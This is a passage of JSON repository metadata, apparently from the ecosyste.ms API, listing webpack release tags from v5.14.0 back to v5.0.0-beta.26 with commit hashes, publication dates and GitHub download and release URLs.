"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:5